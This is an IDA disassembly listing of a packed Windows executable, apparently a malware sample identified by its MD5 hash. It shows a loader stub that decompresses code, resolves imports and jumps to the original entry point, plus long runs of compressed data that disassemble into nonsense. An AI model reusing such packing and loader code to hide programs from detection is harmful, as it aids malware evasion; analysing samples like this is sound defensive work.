;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 73C1E80A82208F7E08629CE12E43A4AA
; File Name : u:\work\73c1e80a82208f7e08629ce12e43a4aa_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0006E000 ( 450560.)
; Section size in file : 0006E000 ( 450560.)
; Offset to raw data for section: 00001000
; Flags F00000C0: Data Bss Shareable Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_nsp0 segment para public 'CODE' use32
assume cs:_nsp0
;org 401000h
assume es:nothing, ss:nothing, ds:_nsp0, fs:nothing, gs:nothing
dword_401000 dd 8013h dup(0) dword_42104C dd 0 dd 0CBECh dup(0)
dd 0FFFFBBFFh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+8]
push esi
push edi
mov ecx, 0F00900A5h
lea edi, [ebp-294h]
rep movsd
mov ebp, 80EDBBFFh
nop
add cl, [edi]
add [ebx], edx
call dword_42104C
push eax
call near ptr 358A4148h
lea eax, [ebp-1323018Ch] ; CODE XREF: .nsp0:004540AC�j
dec eax
mov bh, 1Dh
push eax
push es
push esp
std
or eax, 0ECBD9F06h
out dx, al
and [eax], al
add esp, ebp
or al, 6Ch
sti
push 44323050h
jecxz short loc_45408B
mov edi, 0F6FFD9F7h
add esp, 20h ; CODE XREF: .nsp0:00454068�j
cmp [ebp-8], esi
jnz short loc_454085
push esi
sbb edi, edi
jnz short near ptr loc_45405D+1
cmp [edi-1], eax
mov ch, 0CFh
fidiv word ptr [esi+1D266C7Bh]
dec eax
and al, 14h
push ds
inc edi
mov eax, ds:9FDB3669h
insb
sbb [eax+42h], esi
stosd
pop ecx
loc_454085: ; CODE XREF: .nsp0:00454063�j
pop ecx
push esi
or byte ptr [eax+5Fh], 5Eh
loc_45408B: ; CODE XREF: .nsp0:00454056�j
outsb
sti
out dx, eax
mov byte ptr [ecx+57539784h], 6Ah
push cs
loc_454096: ; CODE XREF: .nsp0:004540F1�j
xor ebx, ebx
pop ecx
loc_454099: ; CODE XREF: .nsp0:004540A0�j
xor eax, eax
scasb
dec ebp
push ecx
out dx, eax
outsd
jnp short loc_454099
mov [ebp-544B00B4h], bl
stosw
stosb
inc esp
jl short near ptr loc_454036+4
push 0F7B90202h
fild qword ptr [ebp-1]
adc [ebx-3F7AFFBDh], ah
jz short near ptr loc_4540C3+2
sub cl, ch
popf
loope loc_45412D
loc_4540C3: ; CODE XREF: .nsp0:004540BC�j
add [edi+57h], ebx
push ebx
push ebx
push 0FFDCD5FFh
jb short locret_45414A
push 3
push 2
pop ds
assume ds:_nsp1
cmp al, 0A4h
cmp eax, 0FFFFFFFFh
mov [ebp-20h], eax
jz near ptr 0EE0D72ACh
mov bh, 0DFh
mov ds:46AC04Dh, al
push ecx
sbb dl, [ebx+50h]
mov [ebp-40h], edi
pop ds
assume ds:_nsp0
js short loc_454096
fstp1 st(2)
push dword ptr [esi+754EA31Ch]
adc al, 66h
mov dword ptr [ebp-58h], 17981709h
sti
outsd
mov edi, 6A08758Bh
sub [esi+3Ah], ah
stosb
mov [ebp-54h], esi
mov byte ptr [ebp-34h], 45h
adc eax, 0DCBB7624h
mov edx, 7D03CE13h
rcr byte ptr [ebp-2Eh], 1
sbb ah, dl
add byte ptr [ebx], 0D0h
int 0B6h ; used by BASIC while in interpreter
out dx, al
aad 6
loc_45412D: ; CODE XREF: .nsp0:004540C1�j
or edx, esi
daa
fsub qword ptr [ebx]
and dh, ch
jg short loc_4541AC
retn
; ---------------------------------------------------------------------------
dec dword ptr [esi+3Fh]
movzx eax, ax
cdq
mov ecx, 0F9F78101h
push edx
sbb ch, [eax+78h]
push esi
xor al, 12h
locret_45414A: ; CODE XREF: .nsp0:004540CD�j
db 36h
retn
; ---------------------------------------------------------------------------
dd 0EC1F75B3h, 47D8940Eh, 7B6DF00Dh, 1055DBBBh, 590C4930h
dd 97559CCh, 0F953F44Bh, 0F9FDCC03h, 6854EB02h, 101B1ECCh
dd 0C06838EBh, 23B16EDEh, 99F87325h, 55896E59h, 7FFFEDF4h
dd 0F7020DCEh, 80D21ADAh, 0D1020EE2h, 68F95588h, 0AD8F4000h
dd 426EC9FBh, 0FAAB50F8h, 50B8458Dh, 6F02FEC0h
; ---------------------------------------------------------------------------
loc_4541AC: ; CODE XREF: .nsp0:00454134�j
mov bh, 19h
mov dh, 10h
adc al, 54h
mov [eax], edx
in al, 1Eh
push eax
adc [eax-49h], ah
fstp9 st(3)
lea edi, [ebp+edi-47F966E8h]
push edx
push eax
imul ebx, [ebx+eax-74EB95E6h], 5EF6DB75h ; CODE XREF: .nsp0:004541DE�j
adc edx, [ebp-18h]
aaa
les esp, [eax+ecx*8+36h]
cld
push 0F7305EE7h
jnb short near ptr loc_4541C5+4
add eax, [ecx-12F8173Eh]
call near ptr 0C831BD1Bh
sbb eax, 0E7C1F88Bh
adc [ecx], cl
or edi, eax
push edi
sbb ecx, [ebp-28h]
outsb
into
sbb edi, eax
pop esp
or al, 0FFh
add dl, [eax+0Dh]
in al, 0F6h
in eax, dx
mov dl, 0Fh
fcomp st(4)
push esi
push es
mov word ptr [eax-6E5D6FA3h], cs
push es
mov ds, bx
lodsd
popf
xchg eax, edx
mov ebx, [edx]
add eax, 6A028D88h
and [esp+esi*2-25h], bl
xor [esi], ebx
or eax, 608DCCB0h
push esi
adc [ebx+edi*4+1Fh], ch
iret
; ---------------------------------------------------------------------------
db 92h
dd 66346A1Ch, 0FC3AC691h, 8072488Dh, 3356146Dh, 9D8C6D60h
dd 53F011D1h, 44AA6C0Eh, 8324C948h, 0BD62845h, 0D0F1BEC9h
dd 50106A2Ch, 0E0252C53h, 6C67B612h, 7452FCB1h, 47102328h
dd 0DBFF4CD9h, 453BE8BFh, 0F3C7FC8h, 0D18CA8Ch, 0EDB738E4h
dd 2E73C478h, 206002B4h, 0E95B322Ch, 92A6925h, 2E108C58h
dd 0DA170CFh, 8B03F16Ch, 1DFA619Eh, 0D4308EB7h, 0A2F8065Eh
dd 5B5FC3A3h, 9553C3C9h, 0DD56EEBEh, 2910246Fh, 0E5180890h
dd 0DBB910A1h, 0A5B4A40h, 7FD88B24h, 3A16EFA4h, 57E70006h
dd 2C1B53A5h, 3732848Dh, 5FBB4Ch, 385650h, 7544C5AEh, 6C23D203h
dd 2558424Bh, 0F799CAE8h, 9AB992FFh, 0C35BE91Bh, 6611BC94h
dd 0B4B73648h, 5E68982Dh, 0C6449659h, 8DF45B2Bh, 4F6B9056h
dd 9C988968h, 87D93901h, 731893F4h, 0DB5F75FCh, 2F96FC44h
dd 322CB593h, 390CFF34h, 5A57DC7Dh, 1BF5F364h, 0FF48D834h
dd 0DEB2755Bh, 341E34B2h, 9666C875h, 57318326h, 764CF4CDh
dd 7CB74C92h, 0CF185057h, 1785D75h, 0E01790D8h, 0EC1B7631h
dd 0DDA86D58h, 556ED815h, 49735967h, 0A5DBAC06h, 0C7C61DDDh
dd 573F6A50h, 24EC0C93h, 0E49B7615h, 0E613BC02h, 0B6B7868Dh
dd 358B0F03h, 98E815C5h, 0B2E1FF08h, 0DF8A5A95h, 0D2332B04h
dd 0DF0DD3CBh, 0D06EF138h, 9F94870Fh, 0FE041C68h, 76AC16FDh
dd 328B9805h, 66D4AAD1h, 9B8B9AA3h, 53FB1CAEh, 3D069C1Dh
dd 80A0239Eh, 0CDA4FD88h, 13A11DD9h, 0CD3074A2h, 8E3C1D8h
dd 8C81235Bh, 49170309h, 9A7D8A4h, 18EB5B37h, 596D45CCh
dd 27DC30A9h, 0F1AA337h, 9607A8A3h, 0E3FB2B92h, 15887001h
dd 17AD12ACh, 0F0E39681h, 904EBE6Bh, 59CD6ECBh, 42B2B2AEh
dd 27B01507h, 1C07DC10h, 0B4687193h, 0B1B93D12h, 0AB4AC326h
dd 0FD68FE57h, 7525851Ah, 32ACFCD9h, 724C64D9h, 0FA058C9Bh
dd 0C406015h, 63876C1Bh, 48710815h, 53DD96DCh, 5045E710h
dd 18664A59h, 32AB64A6h, 965F74C6h, 0B10BFFFDh, 8B3CC06Bh
dd 0AE8C1C8h, 0C1D075F7h, 825114E9h, 0E9861D64h, 0E4D4C809h
dd 4AAD2329h, 0E61C84B6h, 4C832014h, 0EC852D16h, 0C986B3B3h
dd 83F00110h, 34F90670h, 1AF08B07h, 74EC780Bh, 90E49A32h
dd 70EC1803h, 4E2C05E9h, 1E1AECE5h, 2C08BCE5h, 0B17F02Eh
dd 72C9C974h, 0C845F485h, 3203327Ch, 0B0871EC8h, 0E2716153h
dd 7902B081h, 0E2D49B26h, 0C6B4B272h, 2C1E5467h, 13DD174Dh
dd 0E6E426E2h, 0ED6624E8h, 89EAE9D3h, 6B8923DFh, 4C45EDB5h
dd 0FF1CD414h, 936C4F03h, 0DD02D974h, 94C073DAh, 324CB3DEh
dd 14C4F820h, 493E35B7h, 0F28BF8C0h, 0A8364513h, 91324432h
dd 0CC90DC44h, 0C84895B2h, 0EC11E9D0h, 0C28902E4h, 0EC933DF0h
dd 21C9172Eh, 0E0DC57CCh, 44851D57h, 0EA9333CAh, 0E24AE486h
dd 0F4B09345h, 4B919278h, 3BFCF827h, 470A24C6h, 0F8C8929Eh
dd 2E923D3Bh, 9721792h, 0F432B0F1h, 42264231h, 7A612420h
dd 0C6088E20h, 25128ED3h, 0A7400D26h, 0D52D8E91h, 0A6C01D22h
dd 995E342Dh, 0CB7F13Ah, 890EFA61h, 0F5438FB0h, 3D4B21F1h
dd 4C3D8B60h, 2242D73Fh, 59ED2749h, 7C48B511h, 0C066649Ah
dd 3C3438CFh, 1E9F6696h, 23C6589Dh, 54C51C53h, 0ACF48C84h
dd 0D3FEC428h, 80E612C0h, 44EEC0D4h, 21E4BCFFh, 0CC53721Dh
dd 88CC7572h, 7D964790h, 136033ECh, 0FDB25B12h, 0B8705EC3h
dd 3DF73BFCh, 1E911E25h, 3FC98CF0h, 0F5DD9627h, 0B8F60CA9h
dd 0DC1CE510h, 5A6495DDh, 7B5E8E0Ah, 0D17EF3D7h, 553D9691h
dd 6FD22DAh, 12901DCEh, 923835E9h, 58C63D42h, 8ECC63CAh
dd 8A214702h, 0C069E717h, 26EDD7E8h, 619F0EEBh, 0B9CE443Fh
dd 745A1E4Fh, 36F28CC7h, 543489A3h, 0D0CF1C2Fh, 30FA4DADh
dd 0E9E01753h, 9308D30h, 314612FAh, 3938142h, 0D20E4DB7h
dd 9E779E7Dh, 0DA96F6D7h, 1169E161h, 0EE0A2889h, 16AB1A54h
dd 70166E88h, 6B1A93CDh, 2936F0C4h, 0B9958CB9h, 0F5F4DEB5h
dd 22D8B380h, 1B245EDBh, 528DC064h, 0EF06DC1Bh, 1A04D784h
dd 0C600F46h, 654A9C73h, 9CF815B7h, 15B7654Ah, 654A9CF8h
dd 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah
dd 654A9CF8h, 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h
dd 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah, 654A9CF8h
dd 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah
dd 654A9CF8h, 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h
dd 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah, 654A9CF8h
dd 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah
dd 654A9CF8h, 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h
dd 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah, 654A9CF8h
dd 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah
dd 654A9CF8h, 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h
dd 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah, 654A9CF8h
dd 9CF815B7h, 15B7654Ah, 654A9CF8h, 9CF815B7h, 15B7654Ah
dd 654A9CF8h, 37h dup(65656565h), 656565h, 5EC8h dup(0)
dword_46C3B0 dd 0B14h dup(0) _nsp0 ends
; Section 2. (virtual address 0006F000)
; Virtual size : 00019000 ( 102400.)
; Section size in file : 00019000 ( 102400.)
; Offset to raw data for section: 0006F000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_nsp1 segment para public 'CODE' use32
assume cs:_nsp1
;org 46F000h
assume es:nothing, ss:nothing, ds:_nsp0, fs:nothing, gs:nothing
dd 906h, 0
dd 6E000h, 0
dd 400000h, 9 dup(0)
dd 340000h, 0
dd 400000h, 0Ah dup(0)
dd 2, 168h, 2 dup(0)
dd 1, 0
dd offset dword_401000
dd 0
dd 17C63h, 3 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C801AD0h, 7C809A51h, 7C809AE4h
dd 7C81CDDAh, 0
dd 71AB9639h, 4 dup(0)
dd 6F0FCh, 6F09Ch, 3 dup(0)
dd 6F109h, 6F0B8h, 5 dup(0)
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 32535700h, 2E32335Fh
dd 4C4C44h, 6F4C0000h, 694C6461h, 72617262h, 4179h, 74654700h
dd 636F7250h, 72646441h, 737365h, 69560000h, 61757472h
dd 6F72506Ch, 74636574h, 56000000h, 75747269h, 6C416C61h
dd 636F6Ch, 69560000h, 61757472h, 6572466Ch, 65h, 74697845h
dd 636F7250h, 737365h, 71890000h, 3BB8D10h
db 0BEh, 53h
; =============== S U B R O U T I N E =======================================
public start
start proc near
; FUNCTION CHUNK AT 0046F53A SIZE 00000009 BYTES
pushf
pusha
call $+5
pop ebp
sub ebp, 7
lea ecx, [ebp-0FEh]
cmp byte ptr [ecx], 1
jz loc_46F3D6
mov byte ptr [ecx], 1
mov eax, ebp
sub eax, [ebp-16Ah]
mov [ebp-16Ah], eax
add [ebp-13Ah], eax
lea esi, [ebp-0F6h]
add [esi], eax
push ebp
push esi
push 40h
push 1000h
push 1000h
push 0
call dword ptr [ebp-0D2h]
test eax, eax
jz loc_46F53A
mov [ebp-142h], eax
call $+5
pop ebx
mov ecx, 367h
add ebx, ecx
push eax
push ebx
call sub_46F49B
pop esi
pop ebp
mov esi, [esi]
mov edi, ebp
add edi, [ebp-17Ah]
mov ebx, edi
cmp dword ptr [edi], 0
jnz short loc_46F208
add edi, 4
mov ecx, 0
jmp short loc_46F21E
; ---------------------------------------------------------------------------
loc_46F208: ; CODE XREF: start+82�j
mov ecx, 1
add edi, [ebx]
add ebx, 4
loc_46F212: ; CODE XREF: start+CF�j
cmp dword ptr [ebx], 0
jz short loc_46F24B
add [ebx], edx
mov esi, [ebx]
add edi, [ebx+4]
loc_46F21E: ; CODE XREF: start+8C�j
push edi
push ecx
push ebx
push dword ptr [ebp-0CEh]
push dword ptr [ebp-0D2h]
mov edx, esi
mov ecx, edi
mov eax, [ebp-142h]
add eax, 5AAh
call eax
pop ebx
pop ecx
pop edi
cmp ecx, 0
jz short loc_46F24B
add ebx, 8
jmp short loc_46F212
; ---------------------------------------------------------------------------
loc_46F24B: ; CODE XREF: start+9B�j start+CA�j
push 8000h
push 0
push dword ptr [ebp-142h]
call dword ptr [ebp-0CEh]
lea esi, [ebp-13Ah]
mov ecx, [esi+8]
lea edx, [esi+10h]
mov esi, [esi]
mov edi, esi
cmp ecx, 0
jz short loc_46F2B2
loc_46F273: ; CODE XREF: start+100�j start+10E�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_46F278: ; CODE XREF: start+136�j
cmp al, 1
ja short loc_46F273
mov eax, [edi]
cmp byte ptr [edx+1], 0
jz short loc_46F298
mov bl, [edx]
cmp [edi], bl
jnz short loc_46F273
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
jmp short loc_46F2A2
; ---------------------------------------------------------------------------
loc_46F298: ; CODE XREF: start+108�j
mov bl, [edi+4]
xchg al, ah
rol eax, 10h
xchg al, ah
loc_46F2A2: ; CODE XREF: start+11C�j
sub eax, edi
add eax, esi
mov [edi], eax
add edi, 5
sub bl, 0E8h
mov eax, ebx
loop loc_46F278
loc_46F2B2: ; CODE XREF: start+F7�j
call sub_46F3F1
lea ecx, [ebp-126h]
mov eax, [ecx+8]
cmp eax, 0
jz loc_46F34A
mov esi, edx
sub esi, [ecx+10h]
jz short loc_46F34A
mov [ecx+10h], esi
lea esi, [ebp-0F6h]
mov esi, [esi]
lea ebx, [esi-4]
mov eax, [ecx]
cmp eax, 1
jz short loc_46F2EF
mov edi, edx
add edi, [ecx+8]
mov ecx, [ecx+10h]
jmp short loc_46F2F7
; ---------------------------------------------------------------------------
loc_46F2EF: ; CODE XREF: start+169�j
mov edi, esi
add edi, [ecx+8]
mov ecx, [ecx+10h]
loc_46F2F7: ; CODE XREF: start+173�j start+18E�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_46F320
cmp al, 0EFh
ja short loc_46F30A
loc_46F304: ; CODE XREF: start+19D�j start+1A4�j
add ebx, eax
add [ebx], ecx
jmp short loc_46F2F7
; ---------------------------------------------------------------------------
loc_46F30A: ; CODE XREF: start+188�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
or eax, eax
jnz short loc_46F304
mov eax, [edi]
add edi, 4
jmp short loc_46F304
; ---------------------------------------------------------------------------
loc_46F320: ; CODE XREF: start+184�j
xor ebx, ebx
xchg edi, esi
mov eax, [esi]
cmp eax, 0
jz short loc_46F34A
loc_46F32B: ; CODE XREF: start+1BC�j
lodsd
or eax, eax
jz short loc_46F338
add ebx, eax
add [edi+ebx], cx
jmp short loc_46F32B
; ---------------------------------------------------------------------------
loc_46F338: ; CODE XREF: start+1B4�j
xor ebx, ebx
shr ecx, 10h
loc_46F33D: ; CODE XREF: start+1CE�j
lodsd
or eax, eax
jz short loc_46F34A
add ebx, eax
add [edi+ebx], cx
jmp short loc_46F33D
; ---------------------------------------------------------------------------
loc_46F34A: ; CODE XREF: start+149�j start+154�j ...
lea esi, [ebp-16Ah]
mov edx, [esi]
lea esi, [ebp-10Eh]
mov al, [esi]
cmp al, 1
jnz short loc_46F39D
add edx, [esi+4]
push esi
push edx
push esi
push 4
push 100h
push edx
call dword ptr [ebp-0D6h]
pop edi
pop esi
cmp eax, 1
jnz loc_46F53A
add esi, 8
mov ecx, 8
rep movsb
sub esi, 0Ch
sub edi, 8
push esi
push dword ptr [esi-4]
push 100h
push edi
call dword ptr [ebp-0D6h]
loc_46F39D: ; CODE XREF: start+1E2�j
push ebp
pop ebx
sub ebx, 8
xor ecx, ecx
mov cl, [ebx]
cmp cl, 0
jz short loc_46F3D6
inc ebx
lea esi, [ebp-16Ah]
mov edx, [esi]
loc_46F3B7: ; CODE XREF: start+25A�j
push esi
push ecx
push ebx
push edx
push esi
push dword ptr [ebx]
push dword ptr [ebx+4]
mov eax, [ebx+8]
add eax, edx
push eax
call dword ptr [ebp-0D6h]
pop edx
pop ebx
pop ecx
pop esi
add ebx, 0Ch
loop loc_46F3B7
loc_46F3D6: ; CODE XREF: start+14�j start+232�j
mov eax, 0
cmp eax, 0
jz short loc_46F3EA
popa
popf
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_46F3EA: ; CODE XREF: start+264�j
popa
popf
jmp near ptr dword_46C3B0
start endp
; =============== S U B R O U T I N E =======================================
sub_46F3F1 proc near ; CODE XREF: start:loc_46F2B2�p
mov esi, [ebp-172h]
or esi, esi
jz loc_46F496
mov edx, [ebp-16Ah]
add esi, edx
loc_46F407: ; CODE XREF: sub_46F3F1+61�j
cmp dword ptr [esi], 0
jnz short loc_46F41A
cmp dword ptr [esi+4], 0
jnz short loc_46F41A
cmp dword ptr [esi+8], 0
jnz short loc_46F41A
jmp short loc_46F494
; ---------------------------------------------------------------------------
loc_46F41A: ; CODE XREF: sub_46F3F1+19�j
; sub_46F3F1+1F�j ...
mov ebx, [esi+8]
add ebx, edx
push ebx
push edx
push esi
lea edi, [ebp-7Eh]
add edi, [esi+4]
add esi, 0Ch
push edi
call dword ptr [ebp-0DEh]
pop edi
pop edx
pop ebx
cmp eax, 0
jz short loc_46F496
mov [ebp-162h], eax
add edi, [esi]
add esi, 4
loc_46F448: ; CODE XREF: sub_46F3F1+A1�j
xor ecx, ecx
mov cl, [esi]
cmp ecx, 0
jnz short loc_46F454
inc esi
jmp short loc_46F407
; ---------------------------------------------------------------------------
loc_46F454: ; CODE XREF: sub_46F3F1+5E�j
mov eax, edi
add edi, ecx
push edx
push ebx
push eax
cmp byte ptr [eax], 0FFh
jnz short loc_46F468
inc eax
mov eax, [eax]
and eax, 7FFFFFFFh
loc_46F468: ; CODE XREF: sub_46F3F1+6D�j
mov cl, [edi]
mov byte ptr [edi], 0
push ecx
push eax
push dword ptr [ebp-162h]
call dword ptr [ebp-0DAh]
pop ecx
pop edx
pop ebx
pop edx
cmp eax, 0
jz short loc_46F496
mov [edi], cl
mov [esi-4], eax
push dword ptr [esi-4]
pop dword ptr [ebx]
add ebx, 4
inc esi
jmp short loc_46F448
; ---------------------------------------------------------------------------
loc_46F494: ; CODE XREF: sub_46F3F1+27�j
clc
retn
; ---------------------------------------------------------------------------
loc_46F496: ; CODE XREF: sub_46F3F1+8�j
; sub_46F3F1+4A�j ...
jmp loc_46F53A
sub_46F3F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_46F49B proc near ; CODE XREF: start+6C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0046F536 SIZE 00000004 BYTES
push ebp
mov ebp, esp
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
cld
mov dl, 80h
loc_46F4A7: ; CODE XREF: sub_46F49B+12�j
movsb
loc_46F4A8: ; CODE XREF: sub_46F49B+34�j
; sub_46F49B+7D�j
call sub_46F51A
jnb short loc_46F4A7
xor ecx, ecx
call sub_46F51A
jnb short loc_46F4D1
xor eax, eax
call sub_46F51A
jnb short loc_46F4E2
mov al, 10h
loc_46F4C3: ; CODE XREF: sub_46F49B+2F�j
call sub_46F51A
adc al, al
jnb short loc_46F4C3
jnz short loc_46F50F
stosb
jmp short loc_46F4A8
; ---------------------------------------------------------------------------
loc_46F4D1: ; CODE XREF: sub_46F49B+1B�j
call sub_46F526
dec ecx
loop loc_46F4EE
mov eax, ebp
call sub_46F524
jmp short loc_46F510
; ---------------------------------------------------------------------------
loc_46F4E2: ; CODE XREF: sub_46F49B+24�j
lodsb
shr eax, 1
jz short loc_46F536
adc ecx, 2
mov ebp, eax
jmp short loc_46F510
; ---------------------------------------------------------------------------
loc_46F4EE: ; CODE XREF: sub_46F49B+3C�j
xchg eax, ecx
dec eax
shl eax, 8
lodsb
mov ebp, eax
call sub_46F524
cmp eax, 7D00h
jnb short loc_46F50E
cmp eax, 500h
jnb short loc_46F50F
cmp eax, 7Fh
ja short loc_46F510
loc_46F50E: ; CODE XREF: sub_46F49B+65�j
inc ecx
loc_46F50F: ; CODE XREF: sub_46F49B+31�j
; sub_46F49B+6C�j
inc ecx
loc_46F510: ; CODE XREF: sub_46F49B+45�j
; sub_46F49B+51�j ...
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short loc_46F4A8
sub_46F49B endp
; =============== S U B R O U T I N E =======================================
sub_46F51A proc near ; CODE XREF: sub_46F49B:loc_46F4A8�p
; sub_46F49B+16�p ...
add dl, dl
jnz short locret_46F523
mov dl, [esi]
inc esi
adc dl, dl
locret_46F523: ; CODE XREF: sub_46F51A+2�j
retn
sub_46F51A endp
; =============== S U B R O U T I N E =======================================
sub_46F524 proc near ; CODE XREF: sub_46F49B+40�p
; sub_46F49B+5B�p
xor ecx, ecx
sub_46F524 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_46F526 proc near ; CODE XREF: sub_46F49B:loc_46F4D1�p
inc ecx
loc_46F527: ; CODE XREF: sub_46F526+D�j
call sub_46F51A
adc ecx, ecx
call sub_46F51A
jb short loc_46F527
retn
sub_46F526 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_46F49B
loc_46F536: ; CODE XREF: sub_46F49B+4A�j
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_46F49B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_46F53A: ; CODE XREF: start+51�j start+1FD�j ...
push 0
call dword ptr [ebp-0CAh]
retn
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
inc dword ptr [eax]
mov edx, [ecx]
cmp edx, [ecx+4]
jnz short loc_46F556
mov dword ptr [ecx+eax*2], 2300110h
or al, 0FFh
retn
; ---------------------------------------------------------------------------
loc_46F556: ; CODE XREF: .nsp1:0046F54A�j
pop es
mov al, [edx]
inc edx
mov [ecx], edx
pusha
mov eax, [esp+4]
sbb al, 83h
popa
adc [ebx], dh
or [ebx+eax*4], cl
push esi
push ds
and [ebx], al
rol byte ptr [ecx+49h], 1
or bh, bh
push 5
jmp short loc_46F585
; ---------------------------------------------------------------------------
dw 5E58h
dd 239C9E8h, 0F0CE48Bh, 0C1C0B600h
db 0E2h
; ---------------------------------------------------------------------------
loc_46F585: ; CODE XREF: .nsp1:0046F574�j
or [ebx], cl
retn 3E4Eh
; ---------------------------------------------------------------------------
dw 4189h
dd 5EEA750Fh, 5300040Eh, 8718B56h, 85DB3307h, 798057D2h
dd 762C7E0Ch, 0D1EA1C55h, 3BE380EEh, 2B0572FEh, 0CB1D83E8h
dd 0C5778101h, 0C1107360h, 0E8081AE6h, 41848985h, 4DF800E7h
dd 675DD875h, 4C5F6289h, 8B1C5E7Ah, 8CB35BC3h, 614F97F2h
dd 39B70F57h, 3CC1C2DCh, 0AF1E0BE8h, 0C7E00C7h, 4073F83Bh
dd 0BC468931h, 1F566C0h, 0BFD0348Eh, 2B98F01Eh, 0FF00C1FAh
dd 66F80305h, 7F813989h, 195CA87Eh, 0E8CE148Bh, 4E889F2Ah
dd 381DE164h, 0DFF166BAh, 0EB0EE072h, 4FD02B42h, 89566DF8h
dd 8FA06FD7h, 0D00AD20Ch, 0EA50C1E6h, 86DFC29Eh, 0FEE742A3h
dd 5F40021Fh, 0D681C35Eh, 0BB5351ECh, 94DA3E16h, 1E8DB85h
dd 891A7EF9h, 0B240FC5Dh, 708D0855h, 180CE634h, 0FD3FE83Eh
dd 4DE6C603h, 0EB75FC0Ch, 242C25Eh, 0E2D3CB8Bh, 0C9045B5Fh
dd 3A191F95h, 0F8DD8976h, 0C357309Ch, 7D3942FFh, 0FBD98BC9h
dd 207EFCA8h, 12785665h, 1E0C4203h, 0BD2385E8h, 614D0CFh
dd 9E003D3h, 3B47FC45h, 0E27C4812h, 2414151Bh, 6D61C988h
dd 0DAE899F2h, 6E4940ECh, 54E8D3E4h, 380BABCFh, 0BE493DC6h
dd 9FEA7C14h, 35A05B2Bh, 0D29C1950h, 435294FCh, 8751BC4h
dd 65D0D1B8h, 0EEEC1D8h, 1468D07h, 326E0CFh, 471B76C3h
dd 0D07396E8h, 2D80BDBh, 1C75F03Bh, 40A1FB81h, 0B21AEBD3h
dd 221BB657h, 59A276E8h, 1C99D88Bh, 8AB88AE6h, 566585C3h
dd 47FA820Eh, 417CE8F1h, 75C01385h, 0C2A4616h, 403AC57h
dd 4C8D036Ah, 0E85AB030h, 0EB31C7DCh, 24EC03Bh, 32F8D78Bh
dd 755724A8h, 104B1B65h, 0D8C2422h, 0B54E919Fh, 8C08301h
dd 406A11EBh, 2048EF8h, 0CA213A1h, 67D2D210h, 384ABE2Ch
dd 4E0813F9h, 4D41F154h, 24C8030Ch, 0B8704733h, 1A52A4F1h
dd 0DCC9283Dh, 0F44DCCEBh, 28E806C8h, 0D210E6E5h, 4B661AD6h
dd 90F84D41h, 0F020EC06h, 0E7D3E403h, 5073605h, 4ADB325Ah
dd 0CCE1C4Fh, 55604D39h, 0DC2E1060h, 0D6A0873h, 0A0E95802h
dd 769842E1h, 0D1C87540h, 0DCA8B7F9h, 0F3FE202Fh, 61C913ABh
dd 75FF0A66h, 14032018h, 0C84D8D02h, 0A3FCFAE8h, 80207D8Eh
dd 0D470860Fh, 10128A5Dh, 20861923h, 0DE89C1D8h, 66851860h
dd 0F4EA13A3h, 2061AA42h, 0C29B4604h, 55624E73h, 46FD4464h
dd 82766212h, 474223DCh, 8B1A580h, 20E74D2Ah, 0A590C380h
dd 0C59CA3h, 8DC203A1h, 5904004h, 0FF83091Dh, 6C8806E4h
dd 67D0F0Eh, 3F46587h, 243D10EBh, 9E05BA0Ah, 65B903EFh
dd 0A50D060Ah, 830CEF4h, 0F6204974h, 0F8B02B39h, 48A1C9Ah
dd 0AA88103Ch, 65A09A18h, 7783FE1Dh, 4708816Ch, 8AE76C0Eh
dd 1C54D867h, 0F2836A94h, 7EAE0843h, 33340180h, 42E894C2h
dd 3BC1A362h, 0AF1B50C3h, 2DB2E1C7h, 0E823983Ah, 0A62F519Eh
dd 45752F8Eh, 920F47A4h, 0D18A0395h, 0E84605C1h, 75184E86h
